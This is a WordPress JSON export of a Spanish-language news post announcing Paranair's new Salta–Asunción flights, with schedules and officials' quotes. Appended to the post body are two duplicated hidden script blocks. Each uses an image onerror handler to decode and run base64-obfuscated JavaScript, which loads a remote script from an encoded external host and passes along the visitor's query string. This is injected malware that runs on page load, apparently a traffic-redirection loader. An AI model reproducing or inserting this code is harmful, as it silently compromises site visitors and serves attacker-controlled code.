{"id":4507,"date":"2024-10-17T08:39:15","date_gmt":"2024-10-17T11:39:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4507"},"modified":"2025-08-13T23:47:06","modified_gmt":"2025-08-14T02:47:06","slug":"vuelo-salta-asuncion-ya-se-habilito-la-venta-de-tickets-para-febrero-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4507","title":{"rendered":"Vuelo Salta-Asunci\u00f3n: ya se habilit\u00f3 la venta de tickets para febrero 2025"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-background\" style=\"background-color:#b7b8b9\"><em>Paranair, la aerol\u00ednea de bandera de Paraguay que comenzar\u00e1 a operar desde el 12 de febrero con dos frecuencias semanales, habilit\u00f3 la venta de los tickets que conectan Salta con Asunci\u00f3n. Este nuevo enlace a\u00e9reo consolida a la Provincia como hub del Norte Argentino.<\/em><\/h4>\n\n\n\n<p>Desde el 12 de febrero del 2025, Salta se conectar\u00e1 de manera directa con Asunci\u00f3n, Paraguay a trav\u00e9s de la l\u00ednea a\u00e9rea Paranir, quienes ya iniciaron la venta de los tickets en su sistema de comercializaci\u00f3n:&nbsp;<a href=\"https:\/\/www.paranair.com\/es-ar\/home-ar\/\">https:\/\/www.paranair.com\/es-ar\/home-ar\/<\/a>. Tambi\u00e9n se encuentran habilitados para ser adquiridos desde distintas agencias de viajes y turismo.<\/p>\n\n\n\n<p>\u201cEste vuelo llega para seguir apuntalando a la provincia en el crecimiento de sus vuelos internacionales, como nos pide el gobernador Gustavo S\u00e1enz, con un horizonte de crecimiento en el mercado en busca de fortalecer las relaciones comerciales, tur\u00edsticas y culturales entre ambas regiones\u201d, destac\u00f3 el ministro de Turismo y Deportes,<strong>&nbsp;Mario Pe\u00f1a<\/strong>.<\/p>\n\n\n\n<p>\u201cEsta planificaci\u00f3n\u201d, explic\u00f3 el funcionario, se \u201ccomplementa con una importante obra como la del aeropuerto Mart\u00edn Miguel de G\u00fcemes, que permitir\u00e1 incrementar por muchos a\u00f1os las operaciones y conexiones de Salta en materia de conectividad porque ser\u00e1 una de las estaciones aeroportuarias m\u00e1s modernas del pa\u00eds\u201d.<\/p>\n\n\n\n<p>Por su parte el gerente general de Paranair,&nbsp;<strong>Jaime Cassola<\/strong>&nbsp;se\u00f1al\u00f3 \u201cfue una ruta que siempre quisimos retomar y que hoy se concret\u00f3 como resultado de un trabajo mancomunado de la aerol\u00edneas, gobierno y operadores privados con el convencimiento de que ser\u00e1 un \u00e9xito comercial\u201d.<\/p>\n\n\n\n<p>La presidenta del Inprotur Salta,&nbsp;<strong>Manuela Arancibia<\/strong>, inform\u00f3 que \u201clos vuelos a Salta en su etapa inicial tendr\u00e1n dos frecuencias semanales: mi\u00e9rcoles y s\u00e1bados. Son directos sin escala y con una duraci\u00f3n de 1 hora 30 minutos\u201d. Los detalles de horarios y frecuencias son los siguientes:<\/p>\n\n\n\n<p>Mi\u00e9rcoles:<\/p>\n\n\n\n<p>Origen: Salta \u2013 Destino: Asunci\u00f3n. Salida: 16:00 \u2013 Llegada 17:30.<\/p>\n\n\n\n<p>Origen: Asunci\u00f3n \u2013 Destino: Salta. Salida: 13:45 \u2013 Llegada: 15:15<\/p>\n\n\n\n<p>S\u00e1bados:<\/p>\n\n\n\n<p>Origen: Asunci\u00f3n &#8211; Destino: Salta. Salida: 11:55 \u2013 Llegada: 13:25<\/p>\n\n\n\n<p>Origen: Salta \u2013 Destino: Asunci\u00f3n. Salida: 14:10 \u2013 Llegada: 15:40<\/p>\n\n\n\n<p>El mismo ser\u00e1 operado por una de las aeronaves regionales Bombardier CRJ-200ER que ya forma parte de la flota actual de la compa\u00f1\u00eda. La capacidad de los aviones CRJ-200 es de 50 asientos para pasajeros<\/p>\n\n\n\n<p>Cabe destacar que est\u00e1 nueva conexi\u00f3n a\u00e9rea permite que la Provincia se consolide como la puerta de ingreso al pa\u00eds por el Norte argentino, teniendo tres conexiones internacionales (San Pablo, Lima y Asunci\u00f3n) y seis nacionales a todas las regiones del pa\u00eds y hasta fin de a\u00f1o, incrementar\u00e1 de manera sostenible la cantidad de vuelos de las rutas de cabotaje.<\/p>\n\n\n\n<p><em><strong>Sobre Paranair<\/strong><\/em><\/p>\n\n\n\n<p>La l\u00ednea a\u00e9rea de bandera de Paraguay, Paranair, con base en el aeropuerto internacional Silvio Pettirossi de Asunci\u00f3n cuenta actualmente con conexi\u00f3n directa con Ciudad del Este (6 frecuencias semanales), Buenos Aires (14 frecuencias semanales), C\u00f3rdoba (4 frecuencias semanales), Montevideo (14 frecuencias semanales) y Santa Cruz de la Sierra (7 frecuencias semanales), entre sus conexiones m\u00e1s destacadas.<\/p>\n\n\n\n<p>Adem\u00e1s, durante el verano la compa\u00f1\u00eda a\u00e9rea cuenta con vuelos directos a Punta del Este (3 frecuencias semanales), Rio de Janeiro (3 frecuencias semanales) y Florian\u00f3polis (2 frecuencias semanales).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/vuelo-salta-asuncion-ya-se-habilito-la-venta-de-tickets-para-febrero-2025-98257\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Paranair, la aerol\u00ednea de bandera de Paraguay que comenzar\u00e1 a operar desde el 12 de febrero con dos frecuencias semanales, habilit\u00f3 la venta de los tickets que conectan Salta con Asunci\u00f3n. Este nuevo enlace a\u00e9reo consolida a la Provincia como hub del Norte Argentino. Desde el 12 de febrero del 2025, Salta se conectar\u00e1 de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-4507","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4507"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4507"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4507\/revisions"}],"predecessor-version":[{"id":6660,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4507\/revisions\/6660"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}